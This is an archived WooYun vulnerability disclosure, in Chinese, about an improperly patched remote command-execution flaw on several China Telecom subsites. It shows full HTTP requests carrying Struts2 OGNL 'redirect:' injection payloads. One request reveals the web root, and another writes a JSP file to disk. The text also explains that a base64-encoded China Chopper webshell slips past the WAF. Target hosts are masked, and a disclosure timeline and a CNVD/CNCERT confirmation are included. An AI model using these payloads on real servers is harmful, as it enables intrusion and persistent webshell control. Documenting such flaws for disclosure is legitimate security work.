乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-30: 细节已通知厂商并且等待厂商处理中 2016-06-01: 厂商已经确认,细节仅向厂商公开 2016-06-11: 细节向核心白帽子及相关领域专家公开 2016-06-21: 细节向普通白帽子公开 2016-07-01: 细节向实习白帽子公开 2016-07-16: 细节向公众公开
中国电信多个分站命令执行漏洞修复不当(绕过waf写webshell)
http://**.**.**.**:8080/emallTelOmsWeb/sysmgr/login/login.action**.**.**.**/integrateSys/checkNum.action**.**.**.**/item/queryGoods.action
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1Host: **.**.**.**:8080Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4dbUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36DNT: 1Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7eAlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0Content-Length: 220--389b3f46292c4ee795f3f64e37d6f4dbContent-Disposition: form-data; name="redirect:/${(#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/"))}"-1--389b3f46292c4ee795f3f64e37d6f4db--
可以getshell
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1Host: **.**.**.**:8080Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4dbUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36DNT: 1Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7eAlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0Content-Length: 1750--389b3f46292c4ee795f3f64e37d6f4dbContent-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelOmsWeb8083/webapps/emallTelOmsWeb/s.jsp")).append("小马十六进制编码").close()}"-1--389b3f46292c4ee795f3f64e37d6f4db--
然后写入菜刀马(小马base64加密提交即可绕过waf)
http://**.**.**.**:8080/emallTelOmsWeb/f.jsp?z0=utf-8**.**.**.**/s.txt**.**.**.**/s.txt
危害等级:高
漏洞Rank:10
确认时间:2016-06-01 17:52
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
暂无